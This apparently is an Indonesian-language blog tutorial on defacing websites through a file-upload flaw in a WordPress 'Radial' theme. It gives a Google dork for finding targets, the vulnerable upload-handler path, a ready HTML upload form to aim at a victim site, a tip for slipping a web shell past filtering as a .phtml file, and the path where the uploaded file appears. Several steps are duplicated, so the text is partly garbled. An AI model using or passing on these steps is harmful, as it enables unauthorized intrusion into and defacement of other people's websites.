Waz up Jumpa lagi dengan saya yang Gans :3
kali ini gua akan ngasi tutorial deface dengan Mentode Word Press Themes Radial :)
Bahan²
- Dork > inurl:/wp-content/themes/radial-theme/
- Exploit > /wp-content/themes/radial-theme/functions/upload-handler.php
- Csrf >
<form enctype="multipart/form-data"
action="127.0.0.1 /wp-content/themes/radial-theme/functions/upload-handler.php"
method="post">
Please choose a file: <input name="orange_themes" type="file" /><br />
<input type="submit" value="upload" />
</form>
action="127.0.0.1 /wp-content/themes/radial-theme/functions/upload-handler.php"
method="post">
Please choose a file: <input name="orange_themes" type="file" /><br />
<input type="submit" value="upload" />
</form>
w gans
langsung sadja kuyy
pertama lu dorking dulu di google
pertama lu dorking dulu di google
lalu buka website yang mau lu deface
Lalu masukan exploitnya
Kalo Vuln Tanda nya ada tulisan error
lalu buka csrf kalian
lalu buka csrf kalian
Ubah yang 127.0.0.1 menjadi website yg vuln tadi
lalu simpan dengan ekstensi .html (misalnya f.html)
kemudian buka csrf nya
lalu simpan dengan ekstensi .html (misalnya f.html)
kemudian buka csrf nya
Jika sudah pilih script deface kalian
lalu tekan Upload
lalu tekan Upload
*note > jika ingin mengupload shell di bypass ke shell.phtml
Kalo Vuln keluar nama file kalian
Kalo Vuln keluar nama file kalian
lalu tinggal manggil hasil deface nya
> /wp-content/uploads/tahun/bulan/filelu.html
> /wp-content/uploads/tahun/bulan/filelu.html
Greetz :
1 comments
bagi themenya gan ..buat belajar kirim ke auditandrew@gmail.com
EmoticonEmoticon